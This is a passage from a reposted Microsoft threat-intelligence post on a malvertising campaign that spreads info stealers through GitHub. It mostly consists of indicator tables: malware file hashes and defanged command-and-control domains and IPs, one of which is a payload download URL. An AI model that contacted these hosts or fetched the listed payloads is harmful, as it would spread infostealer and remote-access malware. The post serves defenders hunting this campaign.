readability=\"2\">\n<td><em>6Zh7MvxYtHTBFX90Mn.exe<\/em><\/td>\n<td>b96360d48c2755ded301dd017b37dfdce921bdea7731c4b31958d945c8a0b8f5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ExclusivePottery.exe<\/em><\/td>\n<td>54c8a4f58b548c0cf6dbea2522e258723263ccde11d23e48985bdd1fd3535ce2<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>squarel.ps1<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>MadCountries.exe<\/em><\/td>\n<td>9fe2c00641ece18898267b3c6e4ee0cb82ffefbc270c0767c441c3f38b63a12a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HockeyTract.exe<\/em><\/td>\n<td>f136fa82ff73271708afe744f4e6a19cd5039e08ecd3ddad8e4d238f338f4d58<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BruneiPlugins.exe<\/em><\/td>\n<td>453de65c9cc2dc62a67c502cd8bc26968acad9a671c1e095312c1fa6db4a7c74<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CnnCylinder.exe<\/em><\/td>\n<td>a76548a500d81dbb6f50419784a9b0323f5e42245ac7067af2adee0558167116<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>specreal.ps1<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>InflationWinston.exe<\/em><\/td>\n<td>dfbba64219fc63815db538ae8b51e07ec7132f4b39ba4a556c64bd3a5f024c2d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>netsup.ps1&nbsp;<\/em><\/td>\n<td>d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CfUltra.exe<\/em><\/td>\n<td>7880714c47260dba1fd4a4e4598e365b2a5ed0ad17718d8d192d28cf75660584<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CalvinShoppercom.exe<\/em><\/td>\n<td>345a898d5eab800b7b7cbd455135c5474c5f0a9c366df3beb110f225ba734519<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EscortUnavailable.exe<\/em><\/td>\n<td>258efd913cccdb70273c9410070f093337d5574b74c683c1cdff33baff9ffd7c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DisagreeProceed.exe<\/em><\/td>\n<td>9c82a2190930ec778688779a5ad52537d8b0856c8142c71631b308f1f8f0e772<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BarbieBiblical.exe<\/em><\/td>\n<td>34f43bfc0a6f0d0f70b6eee0fa29c6dc62596ab2b867bbabd27c68153ea47f24<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>MysqlManaging.exe<\/em><\/td>\n<td>ef1f9d507a137a4112ac92c576fc44796403eb53d71fe2ddb00376419c8a604e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PillsHarvest.exe<\/em><\/td>\n<td>4af3898ba3cf8b420ea1e6c5ce7cdca7775a4c9b78f67b493a9c73465432f1d3<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>BelfastProt.exe<\/em><\/td>\n<td>ad470bffbd120fc3a6c2c2e52af3c12f9f0153e76fee5e2b489a3d1870bdff03<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HowardLikelihood.exe<\/em><\/td>\n<td>cc08892ace9ac746623b9d0178cd4d149f6a9ab10467fb9059d16f2c0038dcf9<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SorryRequiring.exe<\/em><\/td>\n<td>4a2346d453b2ac894b67625640347c15e74e3091a9aa15629c3a808caaff1b2b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SearchMed.exe<\/em><\/td>\n<td>b0aab51b5e4a9cdd5b3d2785e4dea1ec06b20bc00e4015ccd79e0ba395a20fbd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RepublicChoir.exe<\/em><\/td>\n<td>f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DesignersCrawford.exe<\/em><\/td>\n<td>e8452a65a452abdb4b2e629f767a038e0792e6e2393fb91bf17b27a0ce28c936<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>HumanitarianProvinces.exe<\/em><\/td>\n<td>25cfd6e6a9544990093566d5ea9d7205a60599bfda8c0f4d59fca31e58a7640b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ResetEngaging.exe<\/em><\/td>\n<td>51fbc196175f4fb9f38d843ee53710cde943e5caf1b0552624c7b65e6c231f7e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EducationalDerby.exe<\/em><\/td>\n<td>4a9a8c46ff96e4f066f51ff7e64b1c459967e0cdeb74b6de02cf1033e31c1c7b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>StringsGrill.exe<\/em><\/td>\n<td>f2a8840778484a56f1215f0fa8f6e8b0fb805fce99e62c01ff0a1f541f1d6808<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>CongressionalMechanics.exe<\/em><\/td>\n<td>2060509a63180c2f5075faf88ce7079c48903070c1c6b09fa3f9d6db05b8d9da<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>SexuallyWheat.exe<\/em><\/td>\n<td>d39075915708d012f12b7410cd63e19434d630b2b7dbe60bd72ce003cd2efeaf<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PerceptionCircuits.exe<\/em><\/td>\n<td>0e7dd3aa100d9e22d367cb995879ac4916cb4feb1c6085e06139e02cc7270bba<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>WWv63SKrHflebBd4VW.ps1<\/em><\/td>\n<td>483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>WritingsShanghai.exe<\/em><\/td>\n<td>fa131ea3ce9a9456e1d37065c7f7385ce98ffa329936b5fdd0fd0e78ade88ecb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>IUService.exe<\/em><\/td>\n<td>d5a6714ab95caa92ef1a712465a44c1827122b971bdb28ffa33221e07651d6f7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RttHlp.exe<\/em><\/td>\n<td>8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ASmartService.exe<\/em><\/td>\n<td>75712824b916c1dc8978f65c060340dc69b1efa0145dddbf54299689b9f4a118<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ClaireSpecifically.exe<\/em><\/td>\n<td>746abef4bde48da9f9bff3c23dd6edf8f1bea4b568df2a7d369cb30536ec9ce0<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>report.exe<\/em><\/td>\n<td>6daccc09f5f843b1fa4adde64ad282511f591a641cb474e123fed922167df6ae<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>xh6yIa7PXFCsasc0H5.exe<\/em><\/td>\n<td>5f17501193f5f823f419329bc20534461a7195aa4c456e27af6b0df5b0788041<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>yL6Iwcawoz3KDjg60m.exe<\/em><\/td>\n<td>5ecb4240fae36893973fb306c52c7e548308ebcfba6d101aad4e083407968a96<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CustomsCampbell.exe<\/em><\/td>\n<td>5b80c7d65bb655ccb6e3264f4459a968edcda28084e0ddde16698f642b2d7d83<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HoldemRover.exe<\/em><\/td>\n<td>4c60cdd1ee4045eb0b3bfda8326802d17565f3d1ff6829ac05775ebc6d9ca2dc<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>QUCvpZLobnhvno5v1t.exe<\/em><\/td>\n<td>4bac608722756c80c29fee6f73949c011ea78243e5267e86b7b20b3beeb79f9e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EmilyHaiti.exe<\/em><\/td>\n<td>3221f1356a91d4f06d1deee988be04597cc11bc1cab199ba9c43b9d80dfa88bd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PIPIPOO.exe<\/em><\/td>\n<td>15bf7a141a5a5e7e5c19ffbfbb5b781ae8db52d9ba5ffeb1364964580ed55b13<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ReliefOrganizational.exe<\/em><\/td>\n<td>02533f92d522d47b9d630375633803dd8d6b4723e87d914cd29460d404134a66<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HelloWorld.ps1<\/em><\/td>\n<td>670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c416485<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.zip<\/em><\/td>\n<td>0997201124780f11a16662a0d718b1a3ef3202c5153191f93511d7ecd0de4d8d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.exe<\/em><\/td>\n<td>4b50e7fba5e33bac30b98494361d5ab725022c38271b3eb89b9c4aab457dca78<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage AutoIT, NetSupport RAT, PowerShell, and Lumma<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"10\">\n<tr>\n<td><strong>File name(s)<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><em>Korea.com<\/em> <br \/><em>Fabric.com<\/em> <br \/><em>Affiliated.com<\/em> <br \/><em>Weeks.com<\/em> <br \/><em>Briefly.com<\/em> <br \/><em>Denmark.com<\/em> <br \/><em>Tanzania.com<\/em> <br \/><em>Cookies.com<\/em> <br \/><em>Spice.com<\/em> <br \/><em>SophieHub.scr<\/em> <br \/><em>SpaceWarp.scr<\/em> <br \/><em>SkillSync.scr<\/em> <br \/><em>Quantify.scr<\/em> <br \/><em>HealthPulse<\/em> <br \/><em>CogniFlow.scr<\/em> <br \/><em>ArgonautGuard.scr<\/em><\/td>\n<td>865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>Warrant.com<\/em> <br \/><em>Ford.com<\/em> <br 
\/><em>AutoIt3.exe<\/em> <br \/><em>Seq.com<\/em> <br \/><em>Underwear.com<\/em><\/td>\n<td>1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Presentationhost.exe<\/em><\/td>\n<td>18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>erLX7UsT.ps1<\/em><\/td>\n<td>2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>675aff18abddc.exe<\/em><\/td>\n<td>adf5a9c2db09a782b3080fc011d45eb6eb597d8b475c3c27755992b1d7796e91<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>675aff18abddc.vbs<\/em><\/td>\n<td>5f2b66cf3370323f5be9d7ed8a0597bffea8cc1f76cd96ebb5a8a9da3a1bdc71<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.exe<\/em><\/td>\n<td>707a23dcd031c4b4969a021bc259186ca6fd4046d6b7b1aaffc90ba40b2a603b<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Third-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"4.5\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxp:\/\/keikochio[.]com\/staz\/gribs.zip<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxp:\/\/keikochio[.]com\/incall.php?=compName=&lt;computer name&gt;<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/stocktemplates[.]net\/input.php?compName=&lt;computer name&gt;<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>hxxp:\/\/89.23.96[.]126\/?v=3&amp;event=ready&amp;url=hxxp:\/\/188.245.94[.]250:443\/auto\/28cd7492facfd54e11d48e52398aefa7\/251.exe<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody 
readability=\"14\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>45.141.84[.]60<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>91.202.233[.]18<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>154.216.20[.]131<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>5.10.250[.]240<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>79.132.128[.]77<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/shortlearn[.]click<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/wrathful-jammy[.]cyou<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/mycomp[.]cyou<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/kefuguy[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lumdukekiy[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lumquvonee[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/klipcatepiu0[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/gostrm[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/ukuhost[.]net<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/silversky[.]club<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/pub.culture-quest[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/se-blurry[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/zinc-sneark[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/dwell-exclaim[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/formy-spill[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/covery-mover[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/dare-curbys[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>hxxps:\/\/impend-differ[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/dreasd[.]xyz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/ikores[.]sbs<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/violettru[.]click<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/marshal-zhukov[.]com<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/tailyoveriw[.]my<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage testing connectivity sites<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/baidu.com<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/360.net<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/praxlonfire73[.]live<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>baidu.com and 360.net are legitimate, high-traffic services; their presence in this table reflects a connectivity check performed by the fourth-stage payload, not attacker-controlled infrastructure, so treat them as hunting context rather than as block-list entries.<\/p>\n<h2 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h2>\n<p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:&nbsp;<a href=\"https:\/\/aka.ms\/threatintelblog\">https:\/\/aka.ms\/threatintelblog<\/a>.<\/p>\n<p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence<\/a>, and on X (formerly Twitter) at&nbsp;<a href=\"https:\/\/x.com\/MsftSecIntel\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/x.com\/MsftSecIntel<\/a>.<\/p>\n<p>Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced 
techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\/39\/notes\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\/39\/notes<\/a>. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence<\/a>.<\/p>\n<p> READ MORE <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/06\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft detected a large-scale malvertising campaign in early December 2024 that impacted nearly one million devices globally. The attack originated from illegal streaming websites embedded with malvertising redirectors and ultimately redirected users to GitHub to deliver initial access payloads as the start of a modular and multi-stage attack chain.<br \/>\nThe post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog. 
READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":58261,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[5449,1283,6999,10798,357],"class_list":["post-58260","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-microsoft-secure","tag-credential-theft","tag-cryptojacking","tag-living-off-the-land","tag-storm","tag-windows"]}